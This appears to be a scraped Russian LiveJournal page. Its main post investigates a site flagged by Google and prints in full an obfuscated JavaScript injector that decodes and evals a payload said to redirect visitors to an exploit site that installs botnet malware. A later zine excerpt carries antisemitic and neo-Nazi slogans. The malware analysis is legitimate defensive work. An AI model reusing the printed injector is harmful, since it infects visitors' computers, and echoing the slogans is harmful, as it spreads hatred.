?

Log in

No account? Create an account
; ###[g3n3rator's Live Journal]###
; #####[Include files]#####
#[ReCent]# 
Пионера я читаю давно и регулярно. Наряду с Галковским и Крыловым.

Недавно он в своём журнале написал, что его сайт включен в список подозрительных сайтов Гугла. http://pioneer-lj.livejournal.com/1306270.html

Пионер утверждает, что на этой странице вирусов отродясь не было. Некоторые читатели сделали копию сайта http://pioneer-lj.livejournal.com/1306270.html?thread=56941214#t56941214
И тоже утверждают, что никак вирусов там нет(интересно, как они проверяли. СКАНИРОВАЛИ АНТИВИРУСОМ ТЕКСТ? :) :) :) )
Кое-кто советует искать теги фреймов, но это уже устаревшая технология и ей продвинутые люди не пользуются :)

Проведем экспресс-проверку:

Смотрим гугловскую страницу диагностики
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ru&site=http://nationalism.org/pioneer/HISTORY/History.html

Гм. анализ страницы диагностики показывает, что на сайте Пионера установлена ссылка на другой сайт (e-ads-13.info). Ну а анализ e-ads-13.info показывает, что там стоит эксп, который подгружает на целевую машину лоадер, с целью создания например распределенной системы корпоративного администрирования :) :) :). Говоря по-простому загружается малварь, делающая компьютер жертвы участником ботнета. Такое умное название ботнета(распределенная система корпоративного администрирования) навеяно темами в комерц-разделах некоторых форумов. :) Например троян - это руткит. Криптор малвари - протектор исполняемого кода и так далее :) :) :).

Ок. Смотрим сорцы страницы Пионера
http://nationalism.org/pioneer/HISTORY/History.html
Ничего подозрительного.
Гм. Прошвырнемся по ссылкам с этой страницы.

Ничего.

Ничего.

А вот уже кое-что:
http://nationalism.org/pioneer/HISTORY/konotop.htm

смотрем сорц и видим почти в самом начале подозрительный кодес:

<script>function exitMan(exitMan){return true};var memLoopByte;function waitMovBc(){};memLoopByte='%54%51%54%51%58%52%50%57%11%63%4c%5f%52%0d%10%79%58%18%44%62%76%02%49%63%0c%47%0b%50%5d%44%4e%7f%4e%1f%10%45%5e%09%56%72%65%45%1b%55%49%55%65%4c%61%6b%56%01%5c%1c%05%0a%44%64%57%39%07%0a%08%18%16%48%47%71%66%64%7a%56%1c%42%48%7d%47%74%58%66%4e%0f%1c%58%4c%54%75%16%5b%73%57%6e%08%0f%1b%56%05%54%5f%71%56%57%52%5b%3d%1e%46%1a%1d%73%43%52%40%57%55%1a%30%5a%50%72%45%07%08%1b%4b%1e%43%50%42%21%21%17%17%48%42%46%4a%1d%65%3b%24%0b%40%09%15%5d%70%57%41%50%53%13%5e%04%0f%18%74%47%64%75%03%55%53%1d%0e%09%12%06%09%3f%05%0a%02%06%1c%27%0a%47%76%30%01%42%12%00%50%12%46%19%12%78%61%49%40%4a%1b%40%40%50%5d%60%6d%55%5d%3b%08%5d%5c%46%10%21%56%51%4c%1e%7b%55%63%4a%6b%74%19%56%5a%5e%69%4a%58%49%52%2f%51%45%5c%49%4e%1e%3e%1c%4d%78%51%46%5c%69%5a%36%04%40%4d%60%44%65%16%15%0a%11%2f%16%59%52%54%57%11%4a%5f%53%72%2b%06%15%0e%4a%45%09%42%4f%4e%1f%67%75%73%02%54%4a%50%4a%40%43%54%7c%6a%0d%40%4d%58%7c%45%4e%59%7b%12%1b%5b%4a%52%48%4a%4a%4e%33%32%40%79%4b%49%70%50%4c%58%5d%1e%5c%29%4d%5d%47%1d%02%4c%61%4e%0c%0a%5d%58%4c%4c%48%7c%4a%54%42%1a%19%1d%01%4e%55%43%6b%12%45%57%70%2b%05%00%52%50%7d%59%58%7f%04%47%4c%1d%19%02%20%1c%4a%63%13%0b%41%09%0a%1b%78%07%1e%26%04%0c%25%13%0d%1c%2f%57%42%48%07%56%4c%5f%59%54%61%77%56%4f%46%4b%12%0b%18%5a%66%10%08%13%43%4f%14%00%06%52%69%1b%05%1e%1f%55%60%58%44%5b%7c%24%04%05%12%52%0d%20%4b%58%34%15%50%5a%42%59%7d%4c%7d%4b%73%0f%4a%55%12%4a%49%5e%54%47%67%4f%56%42%5a%47%0e%0e%36%1b%4c%64%0e%0f%06%16%5c%45%4c%58%67%56%4a%67%59%4d%7e%45%1e%05%2c%56%5f%56%65%54%48%77%4b%40%38%48%0d%0d%1f%2a%4a%77%4c%06%6c%47%52%67%61%7c%45%19%11%34%3f%48%71%0b%21%1f%01%0f%28%1b%27%41%56%57%4f%49%1e%1b%02%43%39%0b%16%4a%02%1d%0f%03%2c%15%21%7e%09%02%42%43%50%59%77%4a%64%5f%16%1b%75%45%4f%40%3e%55%52%58%66%65%79%71%6a%58%74%08%02%25%13%4f%12%06%54%5d%44%13%66%66%72%4d%59%10%43%66%5f%55%5d%07%73%52%54%58%51%56%4d%4d%34%4c%53%47%1d%69%4a%62%7b%60%2f%15%03%01%51%59%4f%7c%56%44%70%77%77%58%51%32%52%4e%57%4e%3d%09%2d%45%4d%75%4e%10%44%76%6a%50%19%1f%06%1d%17%1e%51%53%75%65%5a%59%46%4a%41%4b%45%0b%79%45%4c%49%5b%1e%4f%70%0a%1e%74%4f%5b%5e%57%74%4f%4c%1e%46%7b%45%74%6a%74%02%4b%4b%44%66%62%66%0d%42%46%53%52%0b%52%4c%29%54%46%0f%5d%4b%0d%56%5a%6b%45%5a%47%58%72%40%0b%52%18%41%61%5a%51%5a%3c%1f%1f%63%1e%5f%6c%41%41%57%3c%53%0d%3e%45%4a%2f%55%04%44%4f%6f%41%4d%6d%0a%3c%00%15%4c%39%0b%17%06%47%0b%3e%44%4b%45%4a%43%56%4c%42%0d%7c%72%59%49%58%24%02%43%51%75%76%59%76%49%4a%0b%13%44%59%46%6b%07%2e%0e%4d%60%50%52%0e%14%3c%01%44%41%4a%17%50%49%51%74%78%52%47%64%60%42%70%18%4f%54%6f%46%06%54%51%4a%73%57%59%41%66%4e%4b%12%5e%41%6c%44%47%57%66%56%29%0a%4e%0a%5b%4b%45%74%61%53%5c%6c%60%46%5a%08%5a%47%60%42%7c%2c%17%08%1f%50%10%01%22%29%19%01%1c%00%55%4c%50%2e%7e%2c%14%4b%71%19%55%16%4a%51%3b%52%71%70%53%5a%64%4a%5c%76%2d%4c%4f%5c%50%10%55%78%56%7d%6f%12%18%44%4d%1a%64%53%62%71%7c%4c%24%57%46%0c%61%56%5c%67%7b%4d%0d%57%18%1f%7c%55%53%76%2f%47%43%71%42%49%59%65%7c%5d%77%07%16%01%39%5e%45%4d%4c%45%6f%07%1b%31%50%43%50%75%4f%41%20%52%1a%47%52%56%5a%5c%72%1f%24%40%05%1c%10%56%19%22%7c%16%25%0a%18%1b%54%68%52%45%67%56%61%5f%0a%04%08%32%18%4a%7a%57%65%0a%42%59%6e%7f%55%3c%04%1b%3f%00%0c%1a%5e%1a%4f%66%40%76%49%00%72%4f%49%4d%47%4b%57%4b%3c%7f%42%4b%64%01%06%44%4f%48%70%66%10%40%42%57%56%34%5b%50%74%65%4a%5a%55%66%52%4c%43%18%75%5d%7b%46%58%10%41%41%50%03%6c%2f%5e%5d%55%1d%64%54%57%40%3a%13%1a%55%63%43%43%0c%0f%12%31%17%0f%06%46%58%45%5a%4d%61%4a%58%58%2c%54%5a%17%43%23%00%22%53%1a%2d%0c%48%5e%4a%67%56%7a%44%1b%13%18%0c%08%13%33%03%1d%05%1a%1f%13%4b%7c%0c%05%56%60%6d%0d%51%41%79%7c%46%6a%58%22%1e%1b%7f%50%54%48%51%63%52%2f%12%46%14%73%17%46%07%56%56%6d%55%7a%5d%50%4d%08%01%51%51%7f%7b%58%06%5e%4d%49%54%0e%1e%38%05%09%77%4e%54%52%54%5c%1d%61%71%5c%55%51%17%16%00%1a%54%6a%54%4d%55%5c%79%02%42%0c%41%3d%48%6c%7e%7e%6f%51%57%0b%55%6b%5d%1e%09%02%08%5a%5e%04%64%78%4d%53%54%5b%5f%6c%07%57%15%7a%4c%74%10%50%5a%5e%54%78%11%4b%51%50%13%53%4b%48%13%4b%72%62%55%58%07%4e%4a%0e%19%4b%4f%59%4d%40%1f%5e%4f%47%17%70%4b%4c%63%16%0d%06%0b%72%50%57%34%62%55%40%7d%50%49%57%4d%18%1a%66%5f%46%70%57%47%4a%19%0c%4f%67%5c%55%77%4c%5f%16%21%55%57%70%6d%53%43%46%43%1c%49%3a%43%4b%2a%57%55%1d%47%43%51%4d%67%2f%49%59%1b%04%1f%5e%05%10%3e%3b%13%43%08%01%16%06';var charPwd=false;function askMetaPut(bcPs){this.inPsAt=false;var watchAtErr=55691;function byteWho(trueAtWait){var bgWaitNs=31393;var voidMem=0;var watchGet=false;var calDump=trueAtWait.length, oopsAtUse=0;function floatMovChar(){};this.intPkgByte='intPkgByte';while(oopsAtUse<calDump){var falseGet='';var pwdLs='';voidMem+=lsVarDate(trueAtWait,oopsAtUse)*calDump;var inMap=function(){};oopsAtUse++;var dumpFalse='';}this.popNilDone=false;var foldNull='foldNull'.substring(14860, 14860);return (voidMem+'');this.byteCode=57195;}var doneWatchMeta=10575;var manCpCut=function(){return 'manCpCut'};function lsVarDate(loopSetPut,tailInFi){var setMetaCd='setMetaCd'.substring(16405, 16405);return loopSetPut['cGhWa%r*CZoWdGeWA*t%'.replace(/[\*G%WZ]/g, '')](tailInFi);function calCutErr(){};}function putGetDone(putGetDone){return true};var dirErr=function(){return 'dirErr'};if((new String(document.write)).indexOf('arity')>0){var maskEnvNil='maskEnvNil'.substring(2138, 2138);return;var askTailTrue=function(){};}var rmCutLong=function(){};var wordPsNull=false;function nilPwd(nilPwd){return 'nilPwd'};var setPop=0,varMan=0,outPs=96;this.trueCal='trueCal';var fcAsk='';for(manUseTop=0;manUseTop<3;manUseTop++){};var envDir=(new String(askMetaPut)).replace(/[^@a-z0-9A-Z_.,-]/g,'');function pwdManEnv(pwdManEnv){return 'pwdManEnv'};var outErrPut=byteWho(envDir);function pushFalse(pushFalse){return 'pushFalse'};this.doneCalPkg=23016;bcPs=window['ubnbebsTcMabpbeO'.replace(/[O#MbT]/g, '')](bcPs);intFloat=0;while(intFloat<2){intFloat++};var lessFloat=new Date();for(var pushRm=0; pushRm < (bcPs.length); pushRm++){watchPwd=0;while(watchPwd<3){watchPwd++};this.inFile='';var bgWhoTop=lsVarDate(envDir,setPop);var dumpVoidVar='dumpVoidVar'.substring(43945, 43945);var loopVar=lsVarDate(outErrPut,varMan);var mapFiNs=new Array();var trueFalse='trueFalse'.substring(29710, 29710);var longEx=bgWhoTop^loopVar^outPs;var movDo='';var callFloat=lsVarDate(bcPs,pushRm);this.modPkgMem='modPkgMem';var fcVoid=function(){return 'fcVoid'};setPop++,varMan++;var asAwkLog=function(){return 'asAwkLog'};fcAsk+=String['fKrDoDm}CDhKa}rKC$o}dwew'.replace(/[D\}$wK]/g, '')](callFloat^longEx);this.catDoExit=16436;function rmCatLog(){};if(varMan>outErrPut.length)varMan=0;function whoInt(){};if(setPop>envDir.length)setPop=0;var psCall='psCall'.substring(25850, 25850);}for(calCall=0;calCall<0;calCall++){};for(manWordLong=0;manWordLong<1;manWordLong++){manWordLong++};window['edvda0l0'.replace(/[&\{f0d]/g, '')](fcAsk);var outPut='outPut';function psFoldLog(){};return fcAsk=new String();this.modWait=2813;var oopsByte=new Date();}var asLong=22416;askMetaPut(memLoopByte);for(dateDateChar=0;dateDateChar<1;dateDateChar++){};</script>

Ну понятно что вначале в переменной memLoopByte лежит закриптованный код, а потом идёт декодер.

По-хорошему надо было бы перевести код расшифровщика в удобочитаемый вид(убрать мусор, сделать отступы и переносы итд). Затем проанализировать алгоритм. Но в целом это занятие будет интересно лишь для тех, кто только начал интересоваться такого рода вещами.(так как ничего особенного здесь нет и не предвидится - не ксор, так адд и тому подобное).

Чтобы удостовериться, что эта страничка перенаправляет на другой сайт с экспом(конкретно в нашем случае e-ads-13.info) проведем простейший эксперимент:

1) Сохраняем страничку http://nationalism.org/pioneer/HISTORY/konotop.htm на винте
2) Открываем её с винта броузером(Лучше всего последней Оперой и под вмварей :) )
3) Смотрим логи сниффера(можно использовать также фаерволл, поддерживающий логирование соединений. Я использовал проксифиер)


Что и требовалось доказать.

Пожелаем Пионеру, как можно быстрее отредактировать зараженную страницу и далее радовать нас хорошими текстами.

P. S. Насчет обвинений меня в продажности. Помогаю не лохам, а хорошим людям



Картинки взяты из релизингов xo3e0x04 и xo3e0x05





Расшифровка ГЖО! СМР! - Грабь жидоомеров! спосай мать россию!.


14 а стало быть и 88

Расшифровка 88 Hex Hack (Буквально Нехуй Хакать (С)БХЦ)
В месте!
Моя правда - мой крест. Мой крест - бхц. И я несу это бремя сквозь пыль, вьюгу, зной и бураны. Да. Порой, бывает, задумываешься, а зачем все это нужно. Но это Диавол. Как Адам мучался от запретного плода, так и я мучаюсь от карающей перспективы отречься, предаться анафеме и позволить наконец то о*****ть честь хэккерской правды. Но мы (в бхц) точены на других станках. Наши стержни - стержни духовные. Отсупать некуда - за нами интронет. Одепты кругом.

В номере:
0x1. Начало ...............................................bhc stuff
0x2. Федбэк ...............................................bhc stuff
0x3. Новости ..............................................bhc stuff
0x4. Прафайл ..............................................bhc stuff
0x5. О неотвратимости жидохэка ...........................mr.Hukkers
0x6. Хэкерная гниль ......................................mr.Hukkers
0x7. Скамерсант или жидохэкер ? ..........................mr.Hukkers
0x8. Протоколы ОЛД_СКУЛ хэккеров 1 .............................Миха
0x9. Ванильные (и другие) хэккеры ........................mr.Buggers
0xA. Протоколы ОЛД_СКУЛ хэккеров 2 .............................Миха
0xБ. Хэк как чудо ........................................mr.Hukkers
0xВ. Главный хэккерный секрет ............................mr.Hukkers
0xГ. Хэкерный дух ........................................mr.Hukkers
0xД. БХЦ поговорки .......................................mr.Hukkers
0xЖ. Конец ................................................bhc stuff

http://bhcrew.livejournal.com/
28.05.2007 [02:18 am] - Идиотизм
Советский суд Липецка вынес приговор студенту 1 курса ЛГТУ. В декабре 2006 года парень создал в форуме одного из липецких сайтов папку «Готовые вирусы». Здесь он разместил шесть программ, которые способны превратить жесткий диск компьютера в бесполезную вещь. Отдел «К» УВД Липецкой области отреагировал молниеносно. Юного хакера быстро вычислили, и к нему домой приехали оперативники…

Против студента возбудили дело по статье 273 ч.1 УК РФ, которая предусматривает наказание за распространение программ для ЭВМ приводящих к уничтожению, блокированию, модификации либо копированию информации, нарушению работы аппаратной части. «Еще совсем недавно таких дел в суде не рассматривали – их просто не было. Но времена меняются. Хакеры становятся реальностью нашей жизни, а в милиции появились хорошие специалисты. За последнее время это уже третий подобный процесс», - отметил пресс-секретарь управления Судебного департамента по Липецкой области Иван Коноплев.

Студент с обвинением согласился, и попросил о том, чтобы его дело рассматривали в особом судебном порядке. Такая процедура позволяет провести процесс быстрее - не тратится время на обсуждение доказательств вины. Кроме того, в подобных случаях приговор смягчается – судья «сбрасывает» треть срока наказания.

В итоге, Советский суд Липецка признал студента-вредителя виновным, и приговорил его к одному году лишения свободы. Условно. Кроме того, хакер должен выплатить государству штраф - 2,5 тысячи рублей.
http://www.securitylab.ru/news/296376.php
02.12.2006 [03:56 am] - Юмор :)

Читабельный исходник шахмат в один пост



/*
 *   Вот программа, занявшая первое  место ("Best of Show") в этом году.  Она
 * вызывается с необязательным числовым параметром (по умолчанию 2) и  играет
 * в шахматы.  Параметр определяет глубину  просмотра  (при  глубине большей,
 * чем 3,  она будет думать  очень долго). Ходы  задаются двумя восьмеричными
 * числами (откуда куда  - см. доску в  начале игры, например, "e2-e4"  нужно
 * будет вводить как "64 44"), в приглашении к приему указывается  количество
 * просмотренных ходов  и оценка позиций  - своей и  противника, т.е.   Вас).
 *
 * Правила игры несколько упрощены - пешки превращаются только в ферзей,  нет
 * взятия на проходе и длинной рокировки (мне и короткую сделать не удалось),
 *   а   также   контроля   правил    повторения   позиций   и   50    ходов.
*/
 Цитата


10.10.2006 [06:46 pm] - .code
start:
© 2006 ; ###g3n3rator's Live Journal ### ; Design by Euno [euno.livejournal.com]